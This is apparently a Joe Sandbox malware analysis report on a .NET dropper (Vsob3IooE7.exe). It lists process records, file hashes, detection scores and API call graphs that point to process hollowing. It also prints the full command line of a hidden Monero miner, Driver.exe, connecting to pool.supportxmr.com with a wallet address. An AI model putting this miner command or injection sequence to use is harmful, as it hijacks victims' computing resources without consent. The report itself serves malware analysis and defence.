                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Reputation:low

                                                                                          Target ID:7
                                                                                          Start time:16:30:39
                                                                                          Start date:23/05/2023
                                                                                          Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2
                                                                                          Imagebase:0x140000000
                                                                                          File size:4141064 bytes
                                                                                          MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 71%, ReversingLabs
                                                                                          Reputation:moderate

                                                                                          Target ID:8
                                                                                          Start time:16:30:41
                                                                                          Start date:23/05/2023
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7fcd70000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Target ID:9
                                                                                          Start time:16:30:45
                                                                                          Start date:23/05/2023
                                                                                          Path:C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe"
                                                                                          Imagebase:0x690000
                                                                                          File size:2842624 bytes
                                                                                          MD5 hash:E7BF9F0C2C1977DDD8E139C13C27BE0D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Reputation:low

                                                                                          Target ID:10
                                                                                          Start time:16:30:55
                                                                                          Start date:23/05/2023
                                                                                          Path:C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe"
                                                                                          Imagebase:0x4c0000
                                                                                          File size:2842624 bytes
                                                                                          MD5 hash:E7BF9F0C2C1977DDD8E139C13C27BE0D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low


                                                                                            Execution Graph

                                                                                            Execution Coverage:10.4%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:114
                                                                                            Total number of Limit Nodes:7
                                                                                            execution_graph (node and edge layout data not reproduced). API calls reached in the graph, in order of appearance, with the address of the calling node:
                                                                                            2ecd590 SetThreadContext; 2ec6ca8 / 2ec6ca0 / 2ec6cf0 VirtualProtect; 2ecd653 ReadProcessMemory; 1576a50 / 1576b07 GetCurrentProcess; 1576aca GetCurrentThread; 1576b65 GetCurrentThreadId; 157707a DuplicateHandle; 157df80 CreateWindowExW; 2ecd71b VirtualAllocEx; 2ecd257 CreateProcessW; 2ecd8e3 WriteProcessMemory; 157e160 / 157e159 SetWindowLongW; 2ecdd70 PostMessageW; 2ecda91 ResumeThread; 157bc88 GetModuleHandleW; 157bec8 LoadLibraryExW

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph for the function starting at 2ec8668 (basic blocks 2ec8668 to 2ec8b06; block and edge layout data not reproduced)
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Y(O`
                                                                                            • API String ID: 0-2605497086
                                                                                            • Opcode ID: e1a605fff79355854da5e3d38921aab2fe36246e12281b945bf7362d087e4ca3
                                                                                            • Instruction ID: 5537c75839d5bb4dbffa14a10c0bcc3280e9935d4ae2e96d9fe76b9876393157
                                                                                            • Opcode Fuzzy Hash: e1a605fff79355854da5e3d38921aab2fe36246e12281b945bf7362d087e4ca3
                                                                                            • Instruction Fuzzy Hash: 9DD19175E4521A9FCB05DFE9C6915EEBBF2BF88310F20D42AD416B7344EB3499028B91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 02c6b30a1f7a96c6a534c167b313ab2b3341a81d836be6fac7f5978be541566d
                                                                                            • Instruction ID: 690c0101fad888fe996b02bb874306ebadeeb9ee6ef6b7b976369ce811a21a41
                                                                                            • Opcode Fuzzy Hash: 02c6b30a1f7a96c6a534c167b313ab2b3341a81d836be6fac7f5978be541566d
                                                                                            • Instruction Fuzzy Hash: 6B52AE31A0061ACFDB15CF58C885AAEB7B2FF45318F4588A9D909AF251D770FD85CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 95e6e5af872ac059f9ce0a00e02750c53b6e8d2294649138bd84ead676dae00e
                                                                                            • Instruction ID: 4bfcf199cf10846e6e84ec8b402313a95541cad670eb65e6d8fe1ec80ea78c81
                                                                                            • Opcode Fuzzy Hash: 95e6e5af872ac059f9ce0a00e02750c53b6e8d2294649138bd84ead676dae00e
                                                                                            • Instruction Fuzzy Hash: 3FE16D70916204DFC704DFA9D68599DBFF6FB88310B24D46AD50AAB760DB389D42CF21
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7c8353c6f25417343a18cfee1f7a691e74919b63187eec80d11503a822b59712
                                                                                            • Instruction ID: 896eb4b895bbb5f8b6141e0a0f58f4f5a2e71bacca42fe4ac12369342d28a20d
                                                                                            • Opcode Fuzzy Hash: 7c8353c6f25417343a18cfee1f7a691e74919b63187eec80d11503a822b59712
                                                                                            • Instruction Fuzzy Hash: C8E16E70916204DFC704DFA9D68599DBFF6FB88310B24D06AD51AAB760DB389D42CF21
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 95801aecad5ded544de8286481929f5ced9de81e074db82bfd4574d3889f5ab7
                                                                                            • Instruction ID: 13133ce43fe43017880fd276189c65a070370a2b6cd509685176ddba9a63df18
                                                                                            • Opcode Fuzzy Hash: 95801aecad5ded544de8286481929f5ced9de81e074db82bfd4574d3889f5ab7
                                                                                            • Instruction Fuzzy Hash: DAA11774E056598BCB08CFE9C6446AEFBF2BF88310F24D169D419BB358E7349942CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dfbe3519c1ef42cea22c35e34aed1030e2c3128fc4fe664cb427d87a82e5b092
                                                                                            • Instruction ID: 21bdedc54d1c18b59e37d96e056c264ef5112f471000ee56126ed7c29b0483f7
                                                                                            • Opcode Fuzzy Hash: dfbe3519c1ef42cea22c35e34aed1030e2c3128fc4fe664cb427d87a82e5b092
                                                                                            • Instruction Fuzzy Hash: B3A11774E056598BCB09CFE9C6446AEFBF2BF88310F24D16AD419BB358D7349942CB60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3322338bcd93d0c985d93f9802cfdb205a266cb6d4b861b7bcd58c08e8c60b7b
                                                                                            • Instruction ID: 0f0f147869b358c05a74e13f215f62a16defbbf82f421f2e038615df808d340c
                                                                                            • Opcode Fuzzy Hash: 3322338bcd93d0c985d93f9802cfdb205a266cb6d4b861b7bcd58c08e8c60b7b
                                                                                            • Instruction Fuzzy Hash: 67312D71D056888FDB19CFAACC543DEFFF2AFCA310F18C0AAD444AA265DA341946CB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 01576AB0
• GetCurrentThread.KERNEL32 ref: 01576AED
• GetCurrentProcess.KERNEL32 ref: 01576B2A
• GetCurrentThreadId.KERNEL32 ref: 01576B83
Memory Dump Source
• Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 01576AB0
• GetCurrentThread.KERNEL32 ref: 01576AED
• GetCurrentProcess.KERNEL32 ref: 01576B2A
• GetCurrentThreadId.KERNEL32 ref: 01576B83
Memory Dump Source
• Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0

Control-flow Graph (graph not reproduced; first listed basic block 157ba50-157ba75)

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0157BCA6
Memory Dump Source
• Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0

Control-flow Graph (graph not reproduced; first listed basic block 2ecd1d8-2ecd263)

APIs
• CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 02ECD32B
Memory Dump Source
• Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0

Control-flow Graph (graph not reproduced; first listed basic block 157df18-157df7e)

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0157E02A
Memory Dump Source
• Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0

Control-flow Graph (graph not reproduced; first listed basic block 157df0d-157df7e)

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0157E02A
Memory Dump Source
• Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0

Control-flow Graph (graph not reproduced; first listed basic block 1577009-1577010)

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01577107
Memory Dump Source
• Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0

Control-flow Graph (graph not reproduced; first listed basic block 1577078-157707e)

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01577107
Memory Dump Source
• Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0

Control-flow Graph (graph not reproduced; first listed basic block 2ecd898-2ecd8e9)

APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02ECD925
Memory Dump Source
• Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0

Control-flow Graph (graph not reproduced; first listed basic block 157a980-157bf08)

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0157BD21,00000800,00000000,00000000), ref: 0157BF32
Memory Dump Source
• Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
                                                                                            • Opcode ID: 45674d811e5fea1b1864b7c29f16150c7e9272017792c5e08a33494209e72a87
                                                                                            • Instruction ID: e7a2527ea9425b21dce9d4b03ca645af6ba2dd0ae88c25cef270049505972590
                                                                                            • Opcode Fuzzy Hash: 45674d811e5fea1b1864b7c29f16150c7e9272017792c5e08a33494209e72a87
                                                                                            • Instruction Fuzzy Hash: 40216AB28043498FCB10CFAAD844ADEBFF4FF49710F14895AD955AB240C375A545CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 266 1577080-1577114 DuplicateHandle 267 1577116-157711c 266->267 268 157711d-157713a 266->268 267->268
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01577107
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 1da7df45770180b38da5e98b3d6989b9772c983a66af89454902a54f08cbdf67
                                                                                            • Instruction ID: 915d0299d77ea5449052640b29187bc86214c4c82109ff336ee050b47c7407f7
                                                                                            • Opcode Fuzzy Hash: 1da7df45770180b38da5e98b3d6989b9772c983a66af89454902a54f08cbdf67
                                                                                            • Instruction Fuzzy Hash: A421E4B59002099FDB10CFAAE984ADEBFF4FB48320F14841AE954A7310D374A944DFA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 280 2ecd608-2ecd694 ReadProcessMemory 282 2ecd69d-2ecd6be 280->282 283 2ecd696-2ecd69c 280->283 283->282
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02ECD687
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 12fc4f32e123d813ff48649cbe87858dabdaf209ff7884576b112f25235aa469
                                                                                            • Instruction ID: 0e5d8b0f5e482a62a0df6c7b5b68b4ba607088bbc2bec67302c7909a418208df
                                                                                            • Opcode Fuzzy Hash: 12fc4f32e123d813ff48649cbe87858dabdaf209ff7884576b112f25235aa469
                                                                                            • Instruction Fuzzy Hash: 0221EFB19003499FCB10CF9AD984ADEBBF4FB48320F10842AE959A7250D379A944DFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 285 2ecd548-2ecd594 287 2ecd596-2ecd59e 285->287 288 2ecd5a0-2ecd5cc SetThreadContext 285->288 287->288 289 2ecd5ce-2ecd5d4 288->289 290 2ecd5d5-2ecd5f6 288->290 289->290
                                                                                            APIs
                                                                                            • SetThreadContext.KERNELBASE(?,00000000), ref: 02ECD5BF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThread
                                                                                            • String ID:
                                                                                            • API String ID: 1591575202-0
                                                                                            • Opcode ID: 2358d15ad5a603b58c6bcde066dbc31b5ec807482ce9820e0e5af164fd127880
                                                                                            • Instruction ID: e00a074b783d9ca91dae1979867df8822c69c75e15143836b88589b35c0a3b53
                                                                                            • Opcode Fuzzy Hash: 2358d15ad5a603b58c6bcde066dbc31b5ec807482ce9820e0e5af164fd127880
                                                                                            • Instruction Fuzzy Hash: FB21F2B1D1061A9FCB10CF9AC985BEEFBF4BB48724F14812AD418B7640D778A9458FA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02EC6D1B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 544645111-0
                                                                                            • Opcode ID: ff020dd95dd3f81145db5d0fbec3e9381afccc11a6d791dd705f428c367c5339
                                                                                            • Instruction ID: b4e924c183425107cebabca2a62024770e4d5b19afe8aef05d3ea1b4bb19f41c
                                                                                            • Opcode Fuzzy Hash: ff020dd95dd3f81145db5d0fbec3e9381afccc11a6d791dd705f428c367c5339
                                                                                            • Instruction Fuzzy Hash: 6621E7B1D002099FCB10DF9AC984BDEFBF4FB48320F108429E559A7250D778A545DFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02EC6D1B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 544645111-0
                                                                                            • Opcode ID: 89f0bca5f64159ff295d21ff41adfc480c3ae8d3a0ea8d030f0e9eac4fbae573
                                                                                            • Instruction ID: 6069d83e0aa4cf9c3881be98596e516237a174d5c5b33657193d4e352367c9df
                                                                                            • Opcode Fuzzy Hash: 89f0bca5f64159ff295d21ff41adfc480c3ae8d3a0ea8d030f0e9eac4fbae573
                                                                                            • Instruction Fuzzy Hash: D421D6B5D006099FCB10CF9AC984BDEBBF4FB48320F248429E559A7650D378A645DFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 292 157a998-157bf08 294 157bf10-157bf3f LoadLibraryExW 292->294 295 157bf0a-157bf0d 292->295 296 157bf41-157bf47 294->296 297 157bf48-157bf65 294->297 295->294 296->297
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0157BD21,00000800,00000000,00000000), ref: 0157BF32
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: e17f94d9c4586a1bbd9898dd294b5ec681bb612f5795e569833777e46aaf3228
                                                                                            • Instruction ID: c210d05cb9369515404ef6c521b40782f9ce0decf957c4dc4b63f924bab6127d
                                                                                            • Opcode Fuzzy Hash: e17f94d9c4586a1bbd9898dd294b5ec681bb612f5795e569833777e46aaf3228
                                                                                            • Instruction Fuzzy Hash: D511E4B69002099FDB10CF9AD844ADEFBF4FB48710F14852AE525AB600C375A545CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0157BD21,00000800,00000000,00000000), ref: 0157BF32
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: aaa167e0bd46043053e2c7e998c58aca3f522225a9f15a1c1ff16ed68003321f
                                                                                            • Instruction ID: 9590e8055a32c42453b9d20768b70340a610793b3a3774f4a98fd25ff2d82f10
                                                                                            • Opcode Fuzzy Hash: aaa167e0bd46043053e2c7e998c58aca3f522225a9f15a1c1ff16ed68003321f
                                                                                            • Instruction Fuzzy Hash: 9D1114B29002099FDB10CFAAD844ADEFBF4FB48710F10852AE565AB200C775A545CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02ECD743
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 9e7a41392e21d4e5451cec2f6ae11de7f3eab91f4b2236d33c8af5458238bd25
                                                                                            • Instruction ID: c6148dc148ab58cb8329af035a3154733954fbd0b9cee0e597614c35bee3b717
                                                                                            • Opcode Fuzzy Hash: 9e7a41392e21d4e5451cec2f6ae11de7f3eab91f4b2236d33c8af5458238bd25
                                                                                            • Instruction Fuzzy Hash: 5811F2B59002499FCB10CF9AC984BDEBFF4FB88324F208429E529A7210D775A944CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0157BCA6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 39af6968e42ee0fcbec2bbd09d496b9dde9322d884b1fdc977b49814c67514c5
                                                                                            • Instruction ID: 8b018b8fe5d0d7acd3a4ec0053280ca0e27fa82e8d9c7809e92270f891e5f0f3
                                                                                            • Opcode Fuzzy Hash: 39af6968e42ee0fcbec2bbd09d496b9dde9322d884b1fdc977b49814c67514c5
                                                                                            • Instruction Fuzzy Hash: 7A11E3B5C002498FDB10CF9AD544ADEFBF8EF88324F14842AD559B7600D774A545CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 02ECDDCD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            • Opcode ID: dd7798ff1a3eeb6da3bc5580f3511540b58ca41b6c45436b640c2fa01f5be375
                                                                                            • Instruction ID: 1b2586d748304406a109caf6ec51357237e1586d67adcc825907a1cf148e779d
                                                                                            • Opcode Fuzzy Hash: dd7798ff1a3eeb6da3bc5580f3511540b58ca41b6c45436b640c2fa01f5be375
                                                                                            • Instruction Fuzzy Hash: D41112B58003099FDB10CF9AC984BDEBFF8EB48324F20841AE555A7600C375A984CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • SetWindowLongW.USER32(?,?,?), ref: 0157E1BD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1378638983-0
                                                                                            • Opcode ID: d4046bbb8534e1f1218ec21f95b7f020c933a039d906d8379f26afdf31b42aad
                                                                                            • Instruction ID: 1f9de487846de32408a7a7440c12a8ca5a236a0113815e095b22fd321bc0ec21
